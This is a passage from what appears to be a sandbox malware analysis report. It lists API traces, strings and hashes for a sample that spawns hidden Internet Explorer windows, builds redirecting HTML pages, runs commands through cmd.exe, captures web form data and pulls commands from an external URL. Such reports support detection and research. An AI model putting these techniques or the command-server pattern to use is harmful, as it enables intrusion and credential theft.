                            • rand.CRTDLL ref: 004057BE
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                            • rand.CRTDLL ref: 004057E7
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405805
                            • strcat.CRTDLL(?,<head>), ref: 00405819
                            • rand.CRTDLL ref: 00405827
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405845
                            • rand.CRTDLL ref: 0040584D
                            • rand.CRTDLL ref: 0040585F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405880
                            • sprintf.CRTDLL(?,%s<title>%s%u</title>,?,MicroSoft-Corp,?), ref: 004058A3
                            • rand.CRTDLL ref: 004058B1
                            • strcat.CRTDLL(?,0042CC6C), ref: 004058CF
                            • strcat.CRTDLL(?,</head>), ref: 004058E3
                            • rand.CRTDLL ref: 004058EB
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405909
                            • strcat.CRTDLL(?,<body>), ref: 0040591D
                            • rand.CRTDLL ref: 0040592B
                            • rand.CRTDLL ref: 0040593D
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 0040595E
                            • strcat.CRTDLL(?,<script>), ref: 00405972
                            • rand.CRTDLL ref: 0040597A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405998
                            • strcat.CRTDLL(?,function x()), ref: 004059AC
                            • rand.CRTDLL ref: 004059C0
                            • strcat.CRTDLL(?,0042CC6C), ref: 004059DE
                            • strcat.CRTDLL(?,0042CA2E), ref: 004059F2
                            • rand.CRTDLL ref: 004059FA
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A18
                            • sprintf.CRTDLL(?,%sself.parent.location="%s";,?,?), ref: 00405A42
                            • rand.CRTDLL ref: 00405A4A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A68
                            • strcat.CRTDLL(?,0042CA14), ref: 00405A7C
                            • rand.CRTDLL ref: 00405A8A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AA8
                            • rand.CRTDLL ref: 00405AB0
                            • sprintf.CRTDLL(?,%ssetTimeout("x()",%u);,?), ref: 00405AD9
                            • rand.CRTDLL ref: 00405AE1
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AFF
                            • strcat.CRTDLL(?,</script>), ref: 00405B13
                            • rand.CRTDLL ref: 00405B27
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405B45
                            • rand.CRTDLL ref: 00405B4D
                            • rand.CRTDLL ref: 00405B5F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405B80
                            • strcat.CRTDLL(?,</body><html>), ref: 00405B94
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BAC
                            • lstrlenA.KERNEL32(?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BCD
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BE9
                            • CloseHandle.KERNEL32(?,?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BF4
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                             • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp
                             • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmp
                             • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmp
                             • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmp
                             • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$sprintf$File$CloseCreateHandlePathTempWritelstrlen
                            • String ID: %s<!-- %u -->$%s<title>%s%u</title>$%sself.parent.location="%s";$%ssetTimeout("x()",%u);$.htm$</body><html>$</head>$</script>$<body>$<head>$<html>$<script>$MicroSoft-Corp$function x()
                            • API String ID: 4291226702-3565490566
                            • Opcode ID: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction ID: 1c5cdfde58a584b0b9fe07ae47c92bc765a9e47636cc13cf9b12a0be20bdf5ec
                            • Opcode Fuzzy Hash: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction Fuzzy Hash: 93B1CAB6F0132416EB14A262DCC6B6D31AA9B85704F6404FFF508731C2E67C6E558AFE

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?), ref: 00405F73
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?,?), ref: 00405F7E
                              • Part of subcall function 00405F5B: LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                              • Part of subcall function 00405F5B: DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                              • Part of subcall function 00405F5B: CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                              • Part of subcall function 00405F5B: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                              • Part of subcall function 00405F5B: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                              • Part of subcall function 00405F5B: CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            • sscanf.CRTDLL(0000003A,:%02u,?), ref: 0040695B
                            • rand.CRTDLL ref: 00406972
                            • sprintf.CRTDLL(?,%s\cmd.pif,00429080), ref: 004069B5
                            • sprintf.CRTDLL(?,%s\cmd.exe,00429080,?,%s\cmd.pif,00429080), ref: 004069D1
                            • GetWindowsDirectoryA.KERNEL32(?,00000400), ref: 004069E7
                            • sprintf.CRTDLL(?,%s\command.pif,?,?,00000400), ref: 00406A0E
                            • strcat.CRTDLL(?,\command.com,?,%s\command.pif,?,?,00000400), ref: 00406A1F
                            • DeleteFileA.KERNEL32(?,?,?,?,?,00000400), ref: 00406A2E
                            • sprintf.CRTDLL(?,%s /C %s,?,00000036,?,?,?,?,?,00000400), ref: 00406A50
                            • WinExec.KERNEL32(?,00000000), ref: 00406A61
                            • atoi.CRTDLL(00000035), ref: 00406A8E
                            • sprintf.CRTDLL(?,%s\Rtdx1%i.dat,00429080,0000000C), ref: 00406AC4
                            • lstrlenA.KERNEL32(?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406AE4
                            • sprintf.CRTDLL(0000002F,%s/Rtdx1%i.htm,0000002F,0000000C,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B45
                            • lstrlenA.KERNEL32(?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B54
                            • lstrlenA.KERNEL32(0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B66
                            • LocalAlloc.KERNEL32(00000040,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B78
                            • lstrlenA.KERNEL32(?,?,?,00000040,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406BA2
                            • CreateThread.KERNEL32(00000000,00000000,Function_0000686C,?,00000000,0000000C), ref: 00406BD6
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,Function_0000686C,?,00000000,0000000C,?,0000002F,?,?,?,00000040,?,0000002F,?), ref: 00406BDC
                            • LocalFree.KERNEL32(?,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406C07
                            • _sleep.CRTDLL(001B7740), ref: 00406C17
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                             • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp
                             • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmp
                             • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmp
                             • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmp
                             • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$sprintf$LocalThread$AllocCloseCreateDeleteHandle$CacheCodeDirectoryEntryExecExitFileFreeObjectSingleWaitWindows_sleepatoirandsscanfstrcat
                            • String ID: %s /C %s$%s/Rtdx1%i.htm$%s\Rtdx1%i.dat$%s\cmd.exe$%s\cmd.pif$%s\command.pif$/$:$:$:%02u$\command.com$http://tat-neftbank.ru/wcmd.htm$wupd
                            • API String ID: 4275340860-3363018154
                            • Opcode ID: db39d86638ff862d2fb6c91229f091ab8a43fd21800a492105b3074faeac2b45
                            • Instruction ID: 18f08bfc30c9890c11dd244c38850a50baba5aa484248b9ca7ce56826a71177a
                            • Opcode Fuzzy Hash: db39d86638ff862d2fb6c91229f091ab8a43fd21800a492105b3074faeac2b45
                            • Instruction Fuzzy Hash: 328163B1E08228ABDB21A6658D46BD977BCDB04304F5105F7E60CB21C1E67C7F948F99
                            APIs
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 004052F8
                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?,?,?,?), ref: 0040530B
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?), ref: 0040532C
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040539F
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004053B2
                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004053D4
                            • Sleep.KERNEL32(00007800,00000000,00000000,00000044,?), ref: 00405426
                            • Sleep.KERNEL32(0000F000,00007800,00000000,00000000,00000044,?), ref: 00405439
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405451
                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405499
                            • LocalFree.KERNEL32(?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054A5
                            • TerminateProcess.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054B2
                            • CloseHandle.KERNEL32(?,?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054BD
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandleProcessSleepThreadstrcat$CreateCurrentDeleteDesktopFileFreeLocalTerminateTextWindowmemsetsprintf
                            • String ID: %s%u - Microsoft Internet Explorer$D$MicroSoft-Corp$X-okRecv11$\Iexplore.exe
                            • API String ID: 1202517094-2261298365
                            • Opcode ID: e98e409644201e6de021147ee2f0c1805f35588af9548cc9b8076052c01221a7
                            • Instruction ID: a5954b523feb805065d44168e487e19d6cbd8b1c6e851fe6a795fce517e83f05
                            • Opcode Fuzzy Hash: e98e409644201e6de021147ee2f0c1805f35588af9548cc9b8076052c01221a7
                            • Instruction Fuzzy Hash: 4F416572E442186ADB20AA65CC46BDDB3B99F50305F1444F7E208F61D1DABCAEC48F59
                            APIs
                            • SysAllocString.OLEAUT32(value), ref: 00401BCC
                              • Part of subcall function 004017AC: CoInitialize.OLE32(00000000), ref: 004017CC
                              • Part of subcall function 004017AC: CLSIDFromString.OLE32({9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 004017DA
                              • Part of subcall function 004017AC: CoCreateInstance.OLE32(?,00000000,?,0042CD50,?,{9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 00401803
                            • _sleep.CRTDLL(00000000), ref: 00401BFD
                            • GetForegroundWindow.USER32(00000000), ref: 00401C02
                              • Part of subcall function 0040185F: GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • memcpy.CRTDLL(00418F40,?,?), ref: 00401D6D
                            • memcpy.CRTDLL(?,00418F40,?), ref: 00401F34
                            • _sleep.CRTDLL(00000000), ref: 00401F4A
                            • sprintf.CRTDLL(?,%s FORM_%X,?,?,00000000), ref: 00401F77
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: StringWindow_sleepmemcpy$AllocCreateForegroundFromInitializeInstanceTextsprintf
                            • String ID: %s %X%c$%s FORM_%X$%s%c$value
                            • API String ID: 3510745994-3693252589
                            • Opcode ID: 97066158e7caddc246d118ad30601bc5e86c518a965b60cc81196b9f5f35fe85
                            • Instruction ID: 207a0c2c24704257dc82047f11ad41d7b25eba1db427a6dda8aff0efe7f4a5ef
                            • Opcode Fuzzy Hash: 97066158e7caddc246d118ad30601bc5e86c518a965b60cc81196b9f5f35fe85
                            • Instruction Fuzzy Hash: 2112DC71A002199FDB62DB68CD44BDAB7F9BB0C304F5040FAA588E7290D7B4AAC58F55
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                            • GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                            • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                            • GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                            • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                            • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$HandleModule
                            • String ID: NtMapViewOfSection$NtOpenSection$NtUnmapViewOfSection$RtlInitUnicodeString$RtlNtStatusToDosError$ntdll.dll
                            • API String ID: 667068680-1987783197
                            • Opcode ID: f3f948102971a568e61a5bb1a738835a59e2c1009918de6079867c1c535b5a8b
                            • Instruction ID: 9d3c92be313ac2760b75685e9acc68d9338f811418752029c31410863af0f615
                            • Opcode Fuzzy Hash: f3f948102971a568e61a5bb1a738835a59e2c1009918de6079867c1c535b5a8b
                            • Instruction Fuzzy Hash: BCF03A21B642206B93126B327D4293E36689792B19395003FF840F6191DB7C09225F9F
                            APIs
                              • Part of subcall function 00402822: GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            • GetVersion.KERNEL32 ref: 00402E22
                            • LoadLibraryA.KERNEL32 ref: 00402E91
                            • GetProcAddress.KERNEL32 ref: 00402EC5
                            • IsBadReadPtr.KERNEL32(?,00001000), ref: 00402F75
                            • GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                            • CloseHandle.KERNEL32(?), ref: 00403065
                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004030EA
                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040315B
                            • IsBadWritePtr.KERNEL32(00000000,00001000), ref: 004031F1
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Handle$Module$CloseGlobalLibraryLoadMemoryQueryReadStatusVersionVirtualWrite
                            • String ID: kernel32.dll
                            • API String ID: 2089743848-1793498882
                            • Opcode ID: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction ID: cfd5926590b061e949c3a24607155209ead47d6dc4f6dfca132d0ef3b1a5cdf0
                            • Opcode Fuzzy Hash: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction Fuzzy Hash: F6F19070D042B88BEB328F64DD483E9BBB1AB55306F0481EBD588662D2C2B85FC5CF55
                            APIs
                            • printf.CRTDLL([length=%i] [summ=%i],?,00000000), ref: 004037DD
                            • printf.CRTDLL(HEX: ,[length=%i] [summ=%i],?,00000000), ref: 004037EE
                            • printf.CRTDLL(%02X ,00000000), ref: 00403804
                            • printf.CRTDLL(TXT: '%s',?), ref: 0040382C
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: printf
                            • String ID: TXT: '%s'$%02X $HEX: $X4$[length=%i] [summ=%i]
                            • API String ID: 3524737521-4004101572
                            • Opcode ID: ca4ded32e23903f7249d6c5dbeb3a47121f77b3b45ed42eb0d7ff3160f68b428
                            • Instruction ID: a8ef6db4a05ad48ab0456940bf437e850f92713de92630681f76b68ebadef0f7
                            • Opcode Fuzzy Hash: ca4ded32e23903f7249d6c5dbeb3a47121f77b3b45ed42eb0d7ff3160f68b428
                            • Instruction Fuzzy Hash: 88016B62A04254BED7006FA7CC82A6F7FDCAB4175AF2080BEF545730C0D1B86F41D6A6
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 004054F1
                            • lstrlenA.KERNEL32(?,?), ref: 00405505
                            • lstrlenA.KERNEL32(?,?,?), ref: 00405513
                            • lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
                            • LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                            • memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006), ref: 004055FE
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Thread$AllocCloseCodeCreateExitHandleLocalObjectSingleWaitmemcpy
                            • String ID:
                            • API String ID: 2845097592-0
                            • Opcode ID: 7ec933356805a86d395f76af41b9b2d9f18e99f1d3eeeb5c371ae48cad7448a7
                            • Instruction ID: 017c82820a2f145177c9e28e2e3f5c0bebc6ad2cdfe5315ab2aa4ad5daf85086
                            • Opcode Fuzzy Hash: 7ec933356805a86d395f76af41b9b2d9f18e99f1d3eeeb5c371ae48cad7448a7
                            • Instruction Fuzzy Hash: 5E31D721A04159BACF01DFA6CC01AAEB7F9AF44318F144476F904E7291E63CDB15C7A9
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405F73
                            • lstrlenA.KERNEL32(?,?), ref: 00405F7E
                            • LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                            • lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                            • DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Thread$AllocCacheCloseCodeCreateDeleteEntryExitHandleLocalObjectSingleWait
                            • String ID:
                            • API String ID: 794401840-0
                            • Opcode ID: 03fc3e79f5e594bfaf1f893bda151e66fa8c5b5e213fcd764589a016d7372ae4
                            • Instruction ID: 5ee1198a60b0fc2a8532ff5616a25e8349e08cf473eab22e95dc85017e90c3ca
                            • Opcode Fuzzy Hash: 03fc3e79f5e594bfaf1f893bda151e66fa8c5b5e213fcd764589a016d7372ae4
                            • Instruction Fuzzy Hash: B011CA71A082447BD701F6668C42EAFB76DDF85368F144476F600B71C2D678AF0147E9
                            APIs
                            • GetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?), ref: 00402976
                            • SetEntriesInAclA.ADVAPI32(00000001,00000002,?,?), ref: 00402988
                            • SetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029A3
                            • CloseHandle.KERNEL32(?,?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029B1
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmp
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoSecurity$CloseEntriesHandle
                            • String ID: @$CURRENT_USER$\device\physicalmemory
                            • API String ID: 405656561-3357994103
                            • Opcode ID: 3f106b48de9bb5ba9ca254209248b2c107f34978da584956db3145db2ea5644b
                            • Instruction ID: 89d45d45e0a184fa7970b295066ffccd564a705ae1855cc5323f3f658fcd5c06
                            • Opcode Fuzzy Hash: 3f106b48de9bb5ba9ca254209248b2c107f34978da584956db3145db2ea5644b
